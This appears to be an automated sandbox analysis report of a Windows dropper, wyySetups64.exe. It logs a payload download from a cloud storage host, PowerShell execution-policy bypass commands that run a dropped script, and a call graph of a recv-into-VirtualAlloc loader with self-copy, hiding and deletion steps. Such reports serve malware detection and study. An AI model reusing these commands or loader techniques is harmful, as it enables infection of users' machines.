                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:16 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 648
                                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 02:49:36 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-Ranges: bytes
Dec 29, 2024 09:02:17.001821995 CET | 648 | IN | Data Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51
                                                                                                                                                                                                            Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 149.129.12.34 | 443 | 6992 | C:\Users\user\Desktop\wyySetups64.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-29 08:02:00 UTC | 138 | OUT | GET /360instpatch.exe HTTP/1.1
                                                                                                                                                                                                            User-Agent: URLDownloader
                                                                                                                                                                                                            Host: gwwifha84989.oss-ap-northeast-2.aliyuncs.com
                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-29 08:02:01 UTC | 562 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: AliyunOSS
                                                                                                                                                                                                            Date: Sun, 29 Dec 2024 08:02:00 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 4118496
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-oss-request-id: 677101F809267733339AA161
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            ETag: "AAA0F14BDFE3777EEE342C27DE409E6D"
                                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 15:44:55 GMT
                                                                                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                                                                                            x-oss-hash-crc64ecma: 13828654626470641508
                                                                                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                                                                                            x-oss-ec: 0048-00000113
                                                                                                                                                                                                            Content-Disposition: attachment
                                                                                                                                                                                                            x-oss-force-download: true
                                                                                                                                                                                                            Content-MD5: qqDxS9/jd37uNCwn3kCebQ==
                                                                                                                                                                                                            x-oss-server-time: 2



                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:03:01:54
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\wyySetups64.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\wyySetups64.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5 hash:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:03:01:57
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\wyySetups64.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:3'213'672 bytes
                                                                                                                                                                                                            MD5 hash:97090426A42466D139D3E45F47C652F8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:03:02:04
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                                                            Imagebase:0x810000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:03:02:05
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                                                            Imagebase:0x810000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:03:02:08
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Imagebase:0xb10000
                                                                                                                                                                                                            File size:4'118'496 bytes
                                                                                                                                                                                                            MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 17%, ReversingLabs
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:03:02:08
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            Imagebase:0xb10000
                                                                                                                                                                                                            File size:4'118'496 bytes
                                                                                                                                                                                                            MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:03:02:11
                                                                                                                                                                                                            Start date:29/12/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:7.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                              Signature Coverage:4.7%
                                                                                                                                                                                                              Total number of Nodes:1622
                                                                                                                                                                                                              Total number of Limit Nodes:5
10010ccc ___scrt_uninitialize_crt __RTC_Initialize __DllMainCRTStartup@12 11359->11370 11381 10010912 11360->11381 11388 1001124d IsProcessorFeaturePresent 11361->11388 11364 10010cf9 11387 100114af __std_type_info_destroy_list 11364->11387 11366 10010d64 ___scrt_is_nonwritable_in_current_image 11367 10010d9a dllmain_raw 11366->11367 11368 10010d95 11366->11368 11377 10010d80 11366->11377 11369 10010db4 dllmain_crt_dispatch 11367->11369 11367->11377 11371 10011481 _DllMain@12 DisableThreadLibraryCalls 11368->11371 11369->11368 11369->11377 11370->11352 11372 10010dd5 11371->11372 11373 10010e06 11372->11373 11376 10011481 _DllMain@12 DisableThreadLibraryCalls 11372->11376 11374 10010e0f dllmain_crt_dispatch 11373->11374 11373->11377 11375 10010e22 dllmain_raw 11374->11375 11374->11377 11375->11377 11378 10010ded 11376->11378 11377->11352 11379 10010cb7 __DllMainCRTStartup@12 10 API calls 11378->11379 11380 10010dfb dllmain_raw 11379->11380 11380->11373 11382 10010917 ___scrt_release_startup_lock 11381->11382 11383 1001091b _execute_onexit_table 11382->11383 11384 10010927 __DllMainCRTStartup@12 11382->11384 11383->11364 11385 10010934 11384->11385 11386 100116c7 _cexit 11384->11386 11385->11364 11387->11370 11389 10011263 __DllMainCRTStartup@12 11388->11389 11390 1001126f memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11389->11390 11391 10011352 __DllMainCRTStartup@12 11390->11391 11391->11366 10768 1000109e 10769 10010b09 _Error_objects 2 API calls 10768->10769 10770 100010a3 10769->10770 11199 d61549 IsProcessorFeaturePresent 11200 d6155e 11199->11200 11203 d61521 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11200->11203 11202 d61641 11203->11202 10620 1000b020 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10621 1000b080 10620->10621 10622 1000b04c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10620->10622 10624 
1000b078 Concurrency::task_continuation_context::task_continuation_context 10621->10624 10625 1000c120 2 API calls 10621->10625 10622->10621 10623 1000b064 ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10622->10623 10623->10624 10626 1000b09b 10625->10626 10627 1000b0a5 10626->10627 10630 1000b0e1 _Error_objects 10626->10630 10645 10003e80 fgetc 10627->10645 10629 1000b0f0 fgetc 10629->10630 10631 1000b109 Concurrency::task_continuation_context::task_continuation_context 10629->10631 10630->10629 10632 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10630->10632 10634 1000b15e ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10630->10634 10635 1000b198 10630->10635 10638 1000b1af 10630->10638 10647 1000c960 10630->10647 10633 100020a0 2 API calls 10631->10633 10632->10630 10633->10624 10634->10630 10636 1000b233 10635->10636 10639 1000b1a2 Concurrency::task_continuation_context::task_continuation_context 10635->10639 10640 100020a0 2 API calls 10636->10640 10642 1000b1f4 10638->10642 10643 1000b1cf ungetc 10638->10643 10641 100020a0 2 API calls 10639->10641 10640->10624 10641->10624 10644 100020a0 2 API calls 10642->10644 10643->10638 10644->10624 10646 10003e9a 10645->10646 10646->10624 10648 10002cf0 ?_Xout_of_range@std@@YAXPBD 10647->10648 10649 1000c97b 10648->10649 10652 1000cc00 10649->10652 10653 1000cc1f Concurrency::task_continuation_context::task_continuation_context 10652->10653 10656 10002d50 memmove 10653->10656 10655 1000c98b 10655->10630 10656->10655 10771 1000b4a0 10772 1000b4b3 Concurrency::task_continuation_context::task_continuation_context 10771->10772 10773 1000b4c3 Concurrency::task_continuation_context::task_continuation_context 10772->10773 10774 1000b4d4 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10772->10774 10775 1000b4e1 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10774->10775 10776 1000b51e 
10774->10776 10775->10776 10777 1000b4f9 10775->10777 10776->10773 10778 1000c120 2 API calls 10776->10778 10779 1000b502 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10777->10779 10780 1000b539 10778->10780 10779->10773 10781 1000b543 10780->10781 10782 1000b58b 10780->10782 10790 10003eb0 fputc 10781->10790 10783 1000b59b ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10782->10783 10785 1000b5e9 10783->10785 10786 1000b5db 10783->10786 10785->10773 10787 1000b5f6 fwrite 10785->10787 10786->10785 10788 1000b5e1 10786->10788 10787->10773 10788->10773 10789 10003eb0 fputc 10788->10789 10789->10773 10791 10003ecb 10790->10791 10791->10773 11269 10004220 11270 100042cb _Error_objects 11269->11270 11271 1000cd10 10 API calls 11270->11271 11272 1000431d 11271->11272 11273 10004020 5 API calls 11272->11273 11274 1000432f 11273->11274 11275 10002190 8 API calls 11274->11275 11276 10004341 11275->11276 11277 100020a0 2 API calls 11276->11277 11278 1000436b 11277->11278 11279 1000b970 2 API calls 11278->11279 11280 1000437a 11279->11280 11392 1000b2a0 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11393 1000b2b7 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11392->11393 11395 1000b2e3 Concurrency::task_continuation_context::task_continuation_context 11392->11395 11394 1000b2cf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11393->11394 11393->11395 11394->11395 11506 1000ab20 11507 1000ab32 Concurrency::task_continuation_context::task_continuation_context 11506->11507 11509 1000ab85 11506->11509 11508 1000ab71 fflush 11507->11508 11507->11509 11508->11509 11510 d53ff7 MultiByteToWideChar 11511 d54032 11510->11511 11512 d54050 MultiByteToWideChar WideCharToMultiByte 11511->11512 11513 d54095 11512->11513 11514 d540b3 WideCharToMultiByte 11513->11514 11515 d540d9 11514->11515 11399 d60e72 11400 d60e80 11399->11400 11401 d60e7b 11399->11401 11409 d60d3c 11400->11409 
11405 d6140d 11401->11405 11406 d61423 11405->11406 11408 d6142c 11406->11408 11425 d613c0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11406->11425 11408->11400 11411 d60d48 ___scrt_is_nonwritable_in_current_image 11409->11411 11410 d60d57 11411->11410 11412 d60d71 dllmain_raw 11411->11412 11413 d60d6c 11411->11413 11412->11410 11414 d60d8b 11412->11414 11413->11410 11430 d61458 11413->11430 11426 d60b34 11414->11426 11418 d60ddd 11418->11410 11420 d60b34 __DllMainCRTStartup@12 2 API calls 11418->11420 11419 d61458 _DllMain@12 DisableThreadLibraryCalls 11421 d60dc4 11419->11421 11422 d60df0 11420->11422 11424 d60dd2 dllmain_raw 11421->11424 11422->11410 11423 d60df9 dllmain_raw 11422->11423 11423->11410 11424->11418 11425->11408 11427 d60b3f 11426->11427 11429 d60b44 __DllMainCRTStartup@12 11426->11429 11427->11429 11434 d60b87 11427->11434 11429->11413 11431 d60dac 11430->11431 11432 d61461 11430->11432 11431->11418 11431->11419 11432->11431 11433 d6146a DisableThreadLibraryCalls 11432->11433 11433->11431 11435 d60b93 ___scrt_is_nonwritable_in_current_image 11434->11435 11442 d60919 11435->11442 11437 d60b9a __RTC_Initialize __DllMainCRTStartup@12 11439 d60bfd ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11437->11439 11446 d6147a RtlInitializeSListHead 11437->11446 11439->11429 11440 d60bde __DllMainCRTStartup@12 11440->11439 11447 d60850 11440->11447 11443 d60922 11442->11443 11444 d60ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11443->11444 11445 d6092e ___scrt_uninitialize_crt 11444->11445 11445->11437 11446->11440 11448 d60855 ___scrt_release_startup_lock 11447->11448 11449 d60ee7 __DllMainCRTStartup@12 IsProcessorFeaturePresent 11448->11449 11450 d6085e __DllMainCRTStartup@12 11448->11450 11449->11450 11450->11439 11451 100102a9 11452 1001025a 11451->11452 11453 10010229 recv 11452->11453 11454 100102e8 VirtualAlloc memmove 11452->11454 11456 10010276 realloc 11452->11456 11453->11452 11455 
100102a1 11453->11455 11459 1001031d 11454->11459 11457 100102a7 11455->11457 11458 100102ab closesocket WSACleanup free exit 11455->11458 11456->11452 11457->11454 11458->11459 11460 d5f278 11461 d5f29e CloseHandle 11460->11461 11462 d5f2f8 11461->11462 11516 10010b2c 11517 10010b46 11516->11517 11518 10010b3e 11516->11518 11519 10010b1e _MallocaArrayHolder free 11518->11519 11519->11517 10792 100010b0 10793 100010c2 10792->10793 10795 100010d0 10792->10795 10794 1000114e DefWindowProcW 10793->10794 10793->10795 10794->10795 11204 1000bdb0 11205 1000b6e0 9 API calls 11204->11205 11206 1000bdbf 11205->11206 11207 1000bdd2 11206->11207 11208 10010b1e _MallocaArrayHolder free 11206->11208 11208->11207 11463 1000aeb0 11464 1000aebf 11463->11464 11465 1000aef3 ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11464->11465 11466 1000aed9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J 11464->11466 11475 1000aec7 11464->11475 11467 1000af66 11465->11467 11468 1000af17 _Min_value 11465->11468 11466->11475 11470 1000c120 2 API calls 11467->11470 11467->11475 11469 1000af24 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11468->11469 11478 10002ac0 memmove 11469->11478 11476 1000af7b 11470->11476 11472 1000af43 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11472->11467 11473 1000afd7 11473->11475 11477 1000afdd fread 11473->11477 11474 1000af8b fread 11474->11475 11474->11476 11476->11473 11476->11474 11477->11475 11478->11472 11479 1000b6b0 11480 1000b6d0 11479->11480 11481 1000b6c0 _lock_file 11479->11481 11481->11480 10859 d605e7 10864 d60427 10859->10864 10861 d605ef GetCurrentThread WaitForSingleObject CreateThread CreateThread 10877 d51147 LoadLibraryW GetProcAddress GetProcAddress 10861->10877 10920 100048c0 60 API calls 2 library calls 10861->10920 10921 100100c0 20 API calls 10861->10921 10865 d60450 10864->10865 10883 d60357 GetModuleFileNameA 10865->10883 10867 d60463 10885 d60307 GetModuleFileNameA 10867->10885 10869 
d604aa 10870 d60307 GetModuleFileNameA 10869->10870 10876 d6053b 10869->10876 10871 d60565 10870->10871 10872 d6057c CopyFileA 10871->10872 10887 d52077 10872->10887 10874 d6058e ShellExecuteA 10889 d51807 GetModuleHandleA 10874->10889 10876->10861 10878 d51199 GetModuleHandleA RegisterClassW CreateWindowExW 10877->10878 10880 d5121e GetMessageW 10878->10880 10881 d5121c 10878->10881 10880->10881 10882 d51232 TranslateMessage DispatchMessageW 10880->10882 10882->10880 10884 d6039f 10883->10884 10884->10867 10886 d6033a 10885->10886 10886->10869 10888 d52086 10887->10888 10888->10874 10890 d5184a 10889->10890 10899 d515d7 10890->10899 10892 d518a2 10893 d5192f RegisterClassW 10892->10893 10905 d51727 10893->10905 10895 d519b2 CreateWindowExW ShowWindow 10896 d519eb GetMessageW 10895->10896 10897 d51a16 10896->10897 10898 d519ff TranslateMessage DispatchMessageW 10896->10898 10897->10876 10898->10896 10911 d52287 10899->10911 10901 d51612 SHGetKnownFolderPath 10902 d5168e 10901->10902 10903 d51641 10901->10903 10902->10892 10904 d51680 CoTaskMemFree 10903->10904 10904->10902 10906 d51749 10905->10906 10908 d51780 _Error_objects 10905->10908 10913 d60748 RtlAcquireSRWLockExclusive 10906->10913 10908->10895 10909 d51753 _Error_objects 10909->10908 10918 d606f7 RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlWakeAllConditionVariable 10909->10918 10912 d522b8 _Error_objects 10911->10912 10912->10901 10917 d6075c 10913->10917 10914 d60761 RtlReleaseSRWLockExclusive 10914->10909 10917->10914 10919 d60797 SleepConditionVariableSRW 10917->10919 10918->10908 10919->10917 11673 100113b5 11676 100116df 11673->11676 11677 100113c3 _except_handler4_common 11676->11677 11209 d59962 11210 d59965 _Smanip _Error_objects 11209->11210 11211 d54657 DeleteFileA 11210->11211 11212 d59c25 11211->11212 11213 d54417 SetFileAttributesA 11212->11213 11214 d59c56 11213->11214 11215 d59c68 Sleep 11214->11215 11216 d59c80 _Smanip _Error_objects 11215->11216 11217 d54657 DeleteFileA 
11216->11217 11218 d5a1ce 11217->11218 11219 d54417 SetFileAttributesA 11218->11219 11220 d5a1ff 11219->11220 11221 d5a211 Sleep 11220->11221 11222 d5a229 _Smanip _Error_objects 11221->11222 11223 d5a5d8 WinExec 11222->11223 11224 d5a5eb _Smanip _Error_objects 11223->11224 11225 d5a8ca WinExec Sleep 11224->11225 11226 d5a8e8 11225->11226 11227 d54877 SetFileAttributesA 11226->11227 11228 d5a904 11227->11228 11229 d54877 SetFileAttributesA 11228->11229 11230 d5a93e 11229->11230 11231 d54657 DeleteFileA 11230->11231 11232 d5a962 11231->11232 11233 d54657 DeleteFileA 11232->11233 11234 d5a976 11233->11234 11520 1000e739 11521 1000e74a 11520->11521 11522 10002e00 allocator 2 API calls 11521->11522 11523 1000e75d _CxxThrowException 11522->11523 10796 1000d4ba 10797 10002e00 allocator 2 API calls 10796->10797 10798 1000d4cc _CxxThrowException 10797->10798 11284 1000463a 11285 1000cde0 22 API calls 11284->11285 11286 1000464b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 11285->11286 11287 10002190 8 API calls 11286->11287 11288 1000466c 11287->11288 10799 1000d0bc 10800 1000d0c3 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10799->10800 10801 1000be70 3 API calls 10800->10801 10802 1000d0f9 10801->10802 10922 1001153c 10923 10011545 IsProcessorFeaturePresent 10922->10923 10924 10011544 10922->10924 10926 10011587 10923->10926 10929 1001154a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10926->10929 10928 1001166a 10929->10928 10657 10001040 10660 10004000 10657->10660 10663 10003f30 10660->10663 10666 1000cc90 10663->10666 10667 1000cca3 10666->10667 10670 1000e370 10667->10670 10669 10001051 10673 1000cc80 10670->10673 10672 1000e38d memset 10672->10669 10673->10672 10674 10001440 10679 10001470 10674->10679 10677 10001462 10685 100013f0 10679->10685 10682 10010b1e 10689 100113e4 10682->10689 10688 10001300 __std_exception_destroy 10685->10688 10687 100013ff 10687->10677 10687->10682 
10688->10687 10690 10011691 free 10689->10690 10803 100014c0 10806 100014f0 10803->10806 10809 100012c0 __std_exception_copy 10806->10809 10808 100014d3 10809->10808 10691 d60097 WSAStartup getaddrinfo 10692 d60110 WSACleanup 10691->10692 10703 d60129 10691->10703 10707 d6011e 10692->10707 10693 d60144 socket 10695 d60186 connect 10693->10695 10696 d6016d WSACleanup 10693->10696 10694 d601cc FreeAddrInfoW 10697 d601e0 WSACleanup 10694->10697 10701 d601f9 10694->10701 10698 d601c5 10695->10698 10699 d601aa closesocket 10695->10699 10696->10707 10697->10707 10698->10694 10699->10703 10700 d60200 recv 10700->10701 10702 d60278 10700->10702 10701->10700 10706 d602bf VirtualAlloc 10701->10706 10704 d60282 closesocket WSACleanup 10702->10704 10705 d6027e 10702->10705 10703->10693 10703->10694 10704->10707 10705->10706 10706->10707 10708 d54897 10709 d548cf 10708->10709 10736 d54677 GetModuleFileNameA 10709->10736 10711 d548f8 _Smanip _Error_objects 10738 d54657 DeleteFileA 10711->10738 10713 d59c25 10740 d54417 10713->10740 10715 d59c56 10716 d59c68 Sleep 10715->10716 10717 d59c80 _Smanip _Error_objects 10716->10717 10718 d54657 DeleteFileA 10717->10718 10719 d5a1ce 10718->10719 10720 d54417 SetFileAttributesA 10719->10720 10721 d5a1ff 10720->10721 10722 d5a211 Sleep 10721->10722 10723 d5a229 _Smanip _Error_objects 10722->10723 10724 d5a5d8 WinExec 10723->10724 10725 d5a5eb _Smanip _Error_objects 10724->10725 10726 d5a8ca WinExec Sleep 10725->10726 10727 d5a8e8 10726->10727 10744 d54877 10727->10744 10729 d5a904 10730 d54877 SetFileAttributesA 10729->10730 10731 d5a93e 10730->10731 10732 d54657 DeleteFileA 10731->10732 10733 d5a962 10732->10733 10734 d54657 DeleteFileA 10733->10734 10735 d5a976 10734->10735 10737 d546bf _Error_objects Concurrency::task_continuation_context::task_continuation_context 10736->10737 10737->10711 10739 d54668 10738->10739 10739->10713 10742 d5444a 10740->10742 10741 d544be 10741->10715 10742->10741 10743 d544b6 SetFileAttributesA 10742->10743 
